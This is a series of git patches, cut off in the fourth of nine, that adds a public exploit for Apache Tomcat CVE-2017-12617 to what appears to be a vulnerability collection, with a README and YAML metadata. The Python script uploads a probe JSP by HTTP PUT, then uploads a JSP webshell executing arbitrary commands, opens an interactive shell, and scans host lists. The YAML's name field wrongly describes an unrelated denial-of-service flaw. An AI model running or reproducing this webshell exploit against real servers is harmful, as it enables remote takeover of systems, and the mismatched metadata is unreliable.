From 697c172563eb5a730d01a86c4426aebcffbd399b Mon Sep 17 00:00:00 2001
From: li-zifeng-233 <2239118@buaa.edu.cn>
Date: Tue, 11 Apr 2023 19:46:23 +0800
Subject: [PATCH 1/9] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2017-12617?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .DS_Store                                     | Bin 0 -> 8196 bytes
 cve/.DS_Store                                 | Bin 0 -> 10244 bytes
 cve/apache-tomcat/.DS_Store                   | Bin 0 -> 6148 bytes
 cve/apache-tomcat/2017/.DS_Store              | Bin 0 -> 6148 bytes
 .../2017/CVE-2017-12617/README.md             |  57 +++++
 .../CVE-2017-12617/tomcat-cve-2017-12617.py   | 224 ++++++++++++++++++
 cve/apache-tomcat/2017/yaml/.DS_Store         | Bin 0 -> 6148 bytes
 .../2017/yaml/CVE-2017-12617.yaml             |  20 ++
 8 files changed, 301 insertions(+)
 create mode 100644 .DS_Store
 create mode 100644 cve/.DS_Store
 create mode 100644 cve/apache-tomcat/.DS_Store
 create mode 100644 cve/apache-tomcat/2017/.DS_Store
 create mode 100644 cve/apache-tomcat/2017/CVE-2017-12617/README.md
 create mode 100644 cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py
 create mode 100644 cve/apache-tomcat/2017/yaml/.DS_Store
 create mode 100644 cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..50fc29d51a3da9eb7a1ba750642f105c5b2113a2
GIT binary patch
literal 8196
zcmeHM%}*0S6n|4twjy>BP|#?qy_i4{4S^VAs09?_2S^b?(7M|l%F1@8*<C;+Bt7fN
zKS1xEyqcJJ_8-uj@lVjJ2cvIhw$Kkh;>Bp3NoIbtZ{B<J<~O^u`&s}XnKkDOKsNvw
zSOuD`*nFpmaZwveERwV#60`@Nw>@s-mD!-H1)2fPfM!55pc&8%{2dJ7J6jav2k(6~
zs$0!~X5hbMK%5UrtOC;!mKDmQ0~?tFAU2~|7VOK9f5fB^Af_WMD?|wvqD&E$DTz`H
z66Fp=nd5jm(l0Ai=0N1k=qH+)L>UT+QV)`p>Oj&8b*mZB3^Xzza`z_4!#dDOuO@$g
zfg}B2Wszo)mc0>_qAdTVUGm%@92j^<Vol9^_O=);MyqiryTUiJp%tzL8OvW3SF@aZ
zcBOCGb1vP;nVqAYg_g^xFAZFWqRP@OmpObR!`GM-NZYI$Fycl$XLfIG4WAk8OP(DX
z-tJ3oojW_wmmC}#+}@5GU8&ROXL74vk?}`rnIt+YK&-L4JjRP?HEw=AS`B$!S<MI2
ztgI)#uXTUhfrQz9u%o@Ry{qfc;qI=UBS(93W`}L%R|~#~bCi4B&v<KevEaK-wq)g9
zR+tazgD~qpq&f3oo$3sA?(T|aH%q9~xhs(FF8h=+>2GRzIiTTuRevF8CW5@rJ#U%^
zZs>BhuoNK6lOZimvSp4lt|P-!B{3AtQ9nRzu$jN(SvK{iScZooFD_WVZ?OW+Y|guR
z&Q#<H=@u`ieJWh0Mm{MXQ|T*}&MDO~A*DJ1sq`h)HB1tpWt`DedRj^1c*^&}MYslY
zunG_12|R`8@Cx3*d-w=nNDDE^NzzLO$ptb(CddskLuScMa+~CpgIHxxk5y(<NF2my
zPuH_P^EfM@L}>2?2PoL!f(5Mh9w)*}^*!E<x*VT|piWQRG1YoK=#9ZL>iSSbzad_8
zl;og*b1|%bm9!s9uvzEvbDhT~<fGvkjEOZ=&)Wi5VG>4R9Iita#%q1X-qvY%U`!<$
z&nj$!Cu7b@3^3w;lvx<PSL+3L2jE%NbDuyjA*{$X{n}cb8r9Zun89c-!Wi!PIL=uF
zr*=NM2Q?NvQ9OSCgg^1q2zOY~?|)=m7tO%$Gti_=x<&p!{^Q^Of8VjT&<tn>{uu^H
z^H_E)gW*;_uIeKfxporkJ*=V#y|O}Sf{jea5#{R`apw<1>?cuG*rX#YD?|wv{X>AH
LK{uL#Kgz&2TozF`

literal 0
HcmV?d00001

diff --git a/cve/.DS_Store b/cve/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..8745b767fe5b119c88ea9a61f02259f6e4eab7ce
GIT binary patch
literal 10244
zcmeHN%Wfl85UqA%yN#0&X$A=vNS4^JNQO)lW;8-VjwcBU2r|NmLA-)rlXTqfHtu%p
zOcdlb`~$zhmakw3pTV9LoT~0b_m-2eLnyj!b(bIK)UA7}ZuQ*G5RumycOMefh{(su
zc6AAtYYzUM&$*+JfAcP^2R_j;_4dQK(+=bI9NK;16mSYS1)Ks-0jI$KK>^&e`S7cm
zbyuf=Q@|;3r2zMb8cw$L+|Dv9tpgX?0>CcfYdP>9`vBq8a$C>sEVDv|&usVL<y0@<
zVt5%Hzt<QJThHw*vl*Sdj80xYvX}2rJQ*Fln!w4cXVzVv0#1Q>1$ggXq81HtcGUiz
zm(n)Q2Y<^U<X25BtqUuqfKI7L1Nz?B{WJR)#a>bDZ7@glf<lUEVspJW6?Yl2Tt$hI
zx9J(}QxoSGiusdb-czG?FxmjGm?BExDMjp4N|l$tlouWQQ}D;4*$y>qZsACAmsA8h
zV7Bp!74P?d;q5`G08#gCo@D7~BTIU`k1+lV>QhVcI6t@XI4?)EMJF~-a&sH+fcB_?
zNM9-*XU61Jl`aX!3u&ZSoC%YqXV;Xv7->}`3np(_jn+iwN617<i9KS0^Kct8MVtfV
zzNM>%GvTcmnb2bz%=RQ1=1<CgZ4bjBNjEnB@Cply#ZuWX`&Iv&=5ah}rmb|GG+Lvt
z_|s=`9JVjtx7wcvy~*L~{iku1wt}cP5<<}J0rK_pAnL}GMm&zXiEx|Q4}Qh39In28
ze*XC3)>>`z(c_D?+WC{sjkVg=qpgdJivQYM@4WZvVLu#1@sH2}hnL@UX*v6Rb>)2C
zGQ-p6C<^0<R|9*{c^jjWS;xRupSy;o;VV#@*DCjkG1h8?&*pPRbQ-Qmi&LU5oghCE
z>Q}8Y4^huyWBBaD_cgU=VOMAuJ!22G9Rj_JzA?nR7<Dwq<@&R@K4!p3?w1i_>)7+=
zs<ZHAj57jbnvGzirP6*dDy@W>2Jjuib6a6qQ4?FH58#=50xP7tf@o=?E4VMT=p|+t
zO3f#_>P1nL;iD^G=4(oG{n5jUw&JNuu1+z^I@BE^Hdg4!o`vXXj`GI!Ecob%Vq?_6
zI#j_bMeGyUGv$#LH$C3J(PIJ+9aJAjmTEtei$ASgoFH#p+sKAJrc}3yEdvwaUN9B(
zrj3?dnCK-zM~GyKxk<%BDP%_RxW-Lhkv<kp_vt_(ITt3fOrId~E_^<q52<ORB?l(D
zgwapoxr<ZHRO;Epmf?2@zkJtCbi}M-;afw)G95^7=G7JJ-p(po=n_2hy`zsf^qm~N
zVGetSEFOaq+4JK{wy;HHyeG3$_Xw_Gg-lRk17uR`fIeU$7cqOTP1ToJFAG-$D#E%8
zXlO?%TK#5dwIDedC=_dCqDnvwWF25mHkRwm!ur7VFqiCK0D<mRqLb}A!=szeY065O
z*a|&|@*^nlOw>g+*wJv6S&R}?Kv%;npsB*LYNq!ReF+rj0Ugf9vTh6S8@d&NJ;O?x
zTR&W17V_$r=iWF4oB~dPJD|WqHiudjcK7DL|KEX`x+ypXoB}r~;4SVncN+Nha+|M#
z{H(o(^E;e;Fm9Gvq2MBq<6-4-JU;N___uK~c7rV+cwf)$EVK9q$AACF0BfJk&kEfB
XKl?vhm(NnnU9sE$^HYgCw*UVJOrh;t

literal 0
HcmV?d00001

diff --git a/cve/apache-tomcat/.DS_Store b/cve/apache-tomcat/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..8b8fe0eeebbd899cdebbd876fe7cc58f18e93b4c
GIT binary patch
literal 6148
zcmeHK%}(Pm5VlKqafOh2V5MGGio~^oH0mx|?Im=(2d)Ic0Z?h0szjT{Rh!a7sgwgJ
z_F=g406YUP!HpMy8QZN0EgTVo8EO34^W((dM0U&=<F#Q>VXVj)6QGE>0yGN*{it)2
zGZxI_ILA&TTYe;c7~_N_@1FszU7k72W)-%TtsnmmzKsVZY9X^Ye>CWsI$!&}C>$iV
zeamx8`7d9W#j;ot$KI(Nc}X)F4r<N*A&&N>jQnZ8>F<Z_QKPu_N5)ArjN5&c5C&}s
zIXVdAK#pp17zYED>uHB5h(e=S8jq_#s%6Wm*psp~{^i(ZtNOD#nH0pg_08YAjek)$
zmY14(4&SAcRfALb51rY1qE5wY$!>4zeCq4Udflv5Tr}>^ukUZRv;N>!fA93=xzD_Q
z9Lcx?^Wl5y_kmhu>%j1N^L22T^DOS_SsV;Whyh}N7+A=F*&D^mLN6JK0b<}YGl2Vp
z1&ZhzOf{;l0~&P&0L+6~3G~&kKcIyMK-XZZ5iB5FrvmC!Zmt;I+#I-02fu6LQ;j;E
zarI=F$2^&v8wxiU4{oV&#$Aon5(C6QmVqTbEaLh9_vQP4Hi<^W05R~P7~uK3SFgd6
z%-K4(I6P}D&=XJ;j7v4nQlO)bVu;0~xCE*M>=t$aU4yAcuz=8yfTDpKV&F{~cm)3u
BfVcnv

literal 0
HcmV?d00001

diff --git a/cve/apache-tomcat/2017/.DS_Store b/cve/apache-tomcat/2017/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..2b1cb2160a257fbdf6750aac88b1f22045ded275
GIT binary patch
literal 6148
zcmeHK&2AGh5FWP+b*QLv0IA$8aZO>9Zc|loSkmOcl||(MDC~BlcE#>G$`28WA}v??
z3OoT%&<Efdcn}U;Va9es+J;s|Dk{h$jlWsX%sT!iw$}i_8pF5>PzC^wO6c6eW`U5O
z^o%T-o;5_K-cbV=s;~_k*jlj+SO%^;1GIM6U>EkFg{yXc{nnsPYx!v^_oGxs7)P7L
z6VwMkl%RD%ZZzt5P402jO_Tn>b-%KuW#`7t6~4k(`Rm|Nj)Flr81@@s?<GAwmokl}
zb{Op?ol(1dXIJKfFv&YTm5{_840-h;$zwTc$YCD$Rc@diyu?fG^7?q}ZFv>3S>2pe
z#Mtw;(5}0aNr~UR|M1bX_S-be<wrFOV7PxNxovO?M`)bOPkK-d_GQ+cCR`Ms$!61V
z!h4?|e>nd3g*ZKTj7-Lt&gmXr?svTldU-1I1N<$-g#+&)gbdPC_5Xyvjk)^I;;u!l
zYwix!dZ*@Agje_epw_ebEU4?uH($fnz3)e+hI9U3^;+a#P@7rqsX8FtS0?5^&sVQ(
z1p8vkfMwucWq|evflBBbEHtXE0~>V(Ky<KM3EK3TKsmyoZ?Mpa9u%fi5p^mvR}7}p
zv0s=t-(aCprvo#W4`xPY=7z%5==gr2!h!i3ZEG2@44h<OSwEKP{BQmK{(mybK3N7V
z1OF8R%xMPA22RPGt!E}jXRSbegGxeig+`TvjX92$K}YdAsuJ`GG7x=(g+}Z_u^$48
M2HRK${wf1M0bUf`egFUf

literal 0
HcmV?d00001

diff --git a/cve/apache-tomcat/2017/CVE-2017-12617/README.md b/cve/apache-tomcat/2017/CVE-2017-12617/README.md
new file mode 100644
index 00000000..8eb453be
--- /dev/null
+++ b/cve/apache-tomcat/2017/CVE-2017-12617/README.md
@@ -0,0 +1,57 @@
+# CVE-2017-12617
+CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat 
+
+
+<p>affect systems with HTTP PUTs enabled (via setting the "read-only" initialization parameter of the Default servlet to "false") are affected.
+
+<p>Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous 
+<p>remote code execution (RCE) vulnerability on all operating systems if the default servlet is 
+<p>configured with the parameter readonly set to false or the WebDAV servlet is enabled with the 
+<p>parameter readonly set to false
+
+# Apache Tomcat  page
+
+
+<br>./cve-2017-12617.py [options]
+
+<br>options:
+
+<br>-u ,--url [::] check target url if it's vulnerable 
+<br>-p,--pwn  [::] generate webshell and upload it
+<br>-l,--list [::] hosts list
+
+<br>[+]usage:
+
+<br>./cve-2017-12617.py -u http://127.0.0.1
+<br>./cve-2017-12617.py --url http://127.0.0.1
+<br>./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+<br>./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+<br>./cve-2017-12617.py -l hotsts.txt
+<br>./cve-2017-12617.py --list hosts.txt
+
+
+<br><h2>Banner</br>
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/banner.PNG)
+
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/1.PNG)
+<br><h3>Check target if it's vulneabel </br>
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/44.PNG)
+<br><h3> Confirm file was  created </br>
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/2.PNG)
+<br><h3> Create Webshell and get shell
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/3.PNG)
+<br><h3> Scan hosts in txt file<br>
+![alt text](https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/screenshots/5.PNG)
+
+
+
+
+
+
+
+
+
+<h1> <h1> [ @intx0x80 ]
+
+
+
diff --git a/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py b/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py
new file mode 100644
index 00000000..442fc27a
--- /dev/null
+++ b/cve/apache-tomcat/2017/CVE-2017-12617/tomcat-cve-2017-12617.py
@@ -0,0 +1,224 @@
+#!/usr/bin/python
+import requests
+import re
+import signal
+from optparse import OptionParser
+
+
+
+
+
+
+class bcolors:
+    HEADER = '\033[95m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
+
+
+
+
+banner="""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+                                                                           
+                                                                           
+
+[@intx0x80]
+
+"""
+
+
+
+
+
+def signal_handler(signal, frame):
+
+    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
+
+    exit()
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+
+
+def removetags(tags):
+  remove = re.compile('<.*?>')
+  txt = re.sub(remove, '\n', tags)
+  return txt.replace("\n\n\n","\n")
+
+
+def getContent(url,f):
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    requests.packages.urllib3.disable_warnings()
+    re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False)
+    return re.content
+
+def createPayload(url,f):
+    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    requests.packages.urllib3.disable_warnings()
+    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False)
+    if req.status_code==201:
+        print "File Created .."
+
+   
+def RCE(url,f):
+    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
+    <INPUT name='cmd' type=text>
+    <INPUT type=submit value='Run'>
+    </FORM>
+    <%@ page import="java.io.*" %>
+    <%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec(cmd,null,null);
+         BufferedReader sI = new BufferedReader(new
+InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) { output += s+"</br>"; }
+      }  catch(IOException e) {   e.printStackTrace();   }
+   }
+%>
+<pre><%=output %></pre>"""
+
+
+    
+    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    requests.packages.urllib3.disable_warnings()
+    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False)
+    
+
+
+def shell(url,f):
+    
+    while True:
+        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+        cmd=raw_input("$ ")
+        payload={'cmd':cmd}
+        if cmd=="q" or cmd=="Q":
+                break
+        requests.packages.urllib3.disable_warnings()
+        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False)
+        re=str(re.content)
+        t=removetags(re)
+        print t
+
+
+
+
+
+#print bcolors.HEADER+ banner+bcolors.ENDC
+
+parse=OptionParser(
+
+
+bcolors.HEADER+"""
+
+
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+                                                                           
+                                                                           
+
+
+./cve-2017-12617.py [options]
+
+options:
+
+-u ,--url [::] check target url if it's vulnerable 
+-p,--pwn  [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+[+]usage:
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+
+
+[@intx0x80]
+
+"""+bcolors.ENDC
+
+    )
+
+
+parse.add_option("-u","--url",dest="U",type="string",help="Website Url")          
+parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
+parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
+
+(opt,args)=parse.parse_args()
+
+if opt.U==None and opt.P==None and opt.L==None:
+    print(parse.usage)
+    exit(0)
+
+
+
+else:
+    if opt.U!=None and opt.P==None and opt.L==None:
+        print bcolors.OKGREEN+banner+bcolors.ENDC 
+    	url=str(opt.U)
+    	checker="Poc.jsp"
+    	print bcolors.BOLD +"Poc Filename  {}".format(checker)
+    	createPayload(str(url)+"/",checker)
+    	con=getContent(str(url)+"/",checker)
+    	if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+    		print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
+		print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
+		
+	else:
+            print 'Not Vulnerable to CVE-2017-12617 '
+    elif opt.P!=None and opt.U!=None and  opt.L==None:
+                print bcolors.OKGREEN+banner+bcolors.ENDC 
+		pwn=str(opt.P)
+		url=str(opt.U)
+		print "Uploading Webshell ....."
+		pwn=pwn+".jsp"
+		RCE(str(url)+"/",pwn)
+		shell(str(url),pwn)
+    elif opt.L!=None and opt.P==None and opt.U==None:
+                print bcolors.OKGREEN+banner+bcolors.ENDC 
+		w=str(opt.L)
+		f=open(w,"r")
+		print "Scaning hosts in {}".format(w)
+		checker="Poc.jsp"
+		for i in f.readlines():
+			i=i.strip("\n")
+			createPayload(str(i)+"/",checker)
+			con=getContent(str(i)+"/",checker)
+			if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+				print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/cve/apache-tomcat/2017/yaml/.DS_Store b/cve/apache-tomcat/2017/yaml/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..9f5ea099ea710d123ce3f1e3cfa6e7defebb2169
GIT binary patch
literal 6148
zcmeHKF-`+P3>-s>NHmdXDE9+IBn7lfND68sY6vM0rAm?RI-U(<dqIg#NU12$Sh8o=
z=h@9oagG7lVz-$A698knBR)I~&7Zpu?5t&sNaq=I++c<~Tr-|#&b`C~p0Oh9kUz(5
zoHfNBuXsoI*lpj|-F8ie|J-}}^fQbrnG}!$Qa}nw0V!~r0^WOR<BLQ^DIf);z>fm{
zeJFIt+OSWIPX|Mc0K^f~VO+;7K`fpi)`oo|Gc-#oF{#!@3`;umrPbAjePYsKaWl_p
zH(Q%fEN*AML^-S`DoOz<aIC<2ZYSRVSM*=z|6`JNQa}p)D+O${d|EE}O0BmJUe0@M
up})|-jkQtE5UrRPt(Y5c#a9P)#n*gZ8}^AoXFlje{Sk0oWK!TS6!-#GI~t7u

literal 0
HcmV?d00001

diff --git a/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
new file mode 100644
index 00000000..3fa338b5
--- /dev/null
+++ b/cve/apache-tomcat/2017/yaml/CVE-2017-12617.yaml
@@ -0,0 +1,20 @@
+id: CVE-2017-12617
+source: https://github.com/cyberheartmi9/CVE-2017-12617
+info:
+  name: Apache Tomcat是美国阿帕奇（Apache）基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page（JSP）的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载，从而触发拒绝服务。
+  severity: high
+  description:
+    如果默认servlet配置为参数readonly设置为false，或者WebDAV servlet启用为参数readonly设置为false时，所有操作系统上都存在emote代码执行（RCE）漏洞。
+  scope-of-influence:
+    tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82
+  reference:
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2017-12617
+    - https://nvd.nist.gov/vuln/detail/cve-2017-12617
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2017-12617
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: cve2017, Apache, Tomcat，RCE
-- 
Gitee


From 4001a017b2ddbfbfc0df0290aa7eebbbb797de43 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:19:06 +0000
Subject: [PATCH 2/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?apache-tomcat/2017/.DS=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-tomcat/2017/.DS_Store | Bin 6148 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/2017/.DS_Store

diff --git a/cve/apache-tomcat/2017/.DS_Store b/cve/apache-tomcat/2017/.DS_Store
deleted file mode 100644
index 2b1cb2160a257fbdf6750aac88b1f22045ded275..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK&2AGh5FWP+b*QLv0IA$8aZO>9Zc|loSkmOcl||(MDC~BlcE#>G$`28WA}v??
z3OoT%&<Efdcn}U;Va9es+J;s|Dk{h$jlWsX%sT!iw$}i_8pF5>PzC^wO6c6eW`U5O
z^o%T-o;5_K-cbV=s;~_k*jlj+SO%^;1GIM6U>EkFg{yXc{nnsPYx!v^_oGxs7)P7L
z6VwMkl%RD%ZZzt5P402jO_Tn>b-%KuW#`7t6~4k(`Rm|Nj)Flr81@@s?<GAwmokl}
zb{Op?ol(1dXIJKfFv&YTm5{_840-h;$zwTc$YCD$Rc@diyu?fG^7?q}ZFv>3S>2pe
z#Mtw;(5}0aNr~UR|M1bX_S-be<wrFOV7PxNxovO?M`)bOPkK-d_GQ+cCR`Ms$!61V
z!h4?|e>nd3g*ZKTj7-Lt&gmXr?svTldU-1I1N<$-g#+&)gbdPC_5Xyvjk)^I;;u!l
zYwix!dZ*@Agje_epw_ebEU4?uH($fnz3)e+hI9U3^;+a#P@7rqsX8FtS0?5^&sVQ(
z1p8vkfMwucWq|evflBBbEHtXE0~>V(Ky<KM3EK3TKsmyoZ?Mpa9u%fi5p^mvR}7}p
zv0s=t-(aCprvo#W4`xPY=7z%5==gr2!h!i3ZEG2@44h<OSwEKP{BQmK{(mybK3N7V
z1OF8R%xMPA22RPGt!E}jXRSbegGxeig+`TvjX92$K}YdAsuJ`GG7x=(g+}Z_u^$48
M2HRK${wf1M0bUf`egFUf

-- 
Gitee


From 11a58c7ef6defcb3b91ac8a4dea05d30601f24cd Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:19:21 +0000
Subject: [PATCH 3/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?apache-tomcat/.DS=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache-tomcat/.DS_Store | Bin 6148 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-tomcat/.DS_Store

diff --git a/cve/apache-tomcat/.DS_Store b/cve/apache-tomcat/.DS_Store
deleted file mode 100644
index 8b8fe0eeebbd899cdebbd876fe7cc58f18e93b4c..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK%}(Pm5VlKqafOh2V5MGGio~^oH0mx|?Im=(2d)Ic0Z?h0szjT{Rh!a7sgwgJ
z_F=g406YUP!HpMy8QZN0EgTVo8EO34^W((dM0U&=<F#Q>VXVj)6QGE>0yGN*{it)2
zGZxI_ILA&TTYe;c7~_N_@1FszU7k72W)-%TtsnmmzKsVZY9X^Ye>CWsI$!&}C>$iV
zeamx8`7d9W#j;ot$KI(Nc}X)F4r<N*A&&N>jQnZ8>F<Z_QKPu_N5)ArjN5&c5C&}s
zIXVdAK#pp17zYED>uHB5h(e=S8jq_#s%6Wm*psp~{^i(ZtNOD#nH0pg_08YAjek)$
zmY14(4&SAcRfALb51rY1qE5wY$!>4zeCq4Udflv5Tr}>^ukUZRv;N>!fA93=xzD_Q
z9Lcx?^Wl5y_kmhu>%j1N^L22T^DOS_SsV;Whyh}N7+A=F*&D^mLN6JK0b<}YGl2Vp
z1&ZhzOf{;l0~&P&0L+6~3G~&kKcIyMK-XZZ5iB5FrvmC!Zmt;I+#I-02fu6LQ;j;E
zarI=F$2^&v8wxiU4{oV&#$Aon5(C6QmVqTbEaLh9_vQP4Hi<^W05R~P7~uK3SFgd6
z%-K4(I6P}D&=XJ;j7v4nQlO)bVu;0~xCE*M>=t$aU4yAcuz=8yfTDpKV&F{~cm)3u
BfVcnv

-- 
Gitee


From 5cc584e9586691d460c2efc7b2dc18af6fae0152 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=A2=93=E6=9E=AB233?= <2239118@buaa.edu.cn>
Date: Fri, 14 Apr 2023 08:19:28 +0000
Subject: [PATCH 4/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?.DS=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/.DS_Store | Bin 10244 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/.DS_Store

diff --git a/cve/.DS_Store b/cve/.DS_Store
deleted file mode 100644
index 8745b767fe5b119c88ea9a61f02259f6e4eab7ce..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 10244
zcmeHN%Wfl85UqA%yN#0&X$A=vNS4^JNQO)lW;8-VjwcBU2r|NmLA-)rlXTqfHtu%p
zOcdlb`~$zhmakw3pTV9LoT~0b_m-2eLnyj!b(bIK)UA7}ZuQ*G5RumycOMefh{(su
zc6AAtYYzUM&$*+JfAcP^2R_j;_4dQK(+=bI9NK;16mSYS1)Ks-0jI$KK>^&e`S7cm
zbyuf=Q@|;3r2zMb8cw$L+|Dv9tpgX?0>CcfYdP>9`vBq8a$C>sEVDv|&usVL<y0@<
zVt5%Hzt<QJThHw*vl*Sdj80xYvX}2rJQ*Fln!w4cXVzVv0#1Q>1$ggXq81HtcGUiz
zm(n)Q2Y<^U<X25BtqUuqfKI7L1Nz?B{WJR)#a>bDZ7@glf<lUEVspJW6?Yl2Tt$hI
zx9J(}QxoSGiusdb-czG?FxmjGm?BExDMjp4N|l$tlouWQQ}D;4*$y>qZsACAmsA8h
zV7Bp!74P?d;q5`G08#gCo@D7~BTIU`k1+lV>QhVcI6t@XI4?)EMJF~-a&sH+fcB_?
zNM9-*XU61Jl`aX!3u&ZSoC%YqXV;Xv7->}`3np(_jn+iwN617<i9KS0^Kct8MVtfV
zzNM>%GvTcmnb2bz%=RQ1=1<CgZ4bjBNjEnB@Cply#ZuWX`&Iv&=5ah}rmb|GG+Lvt
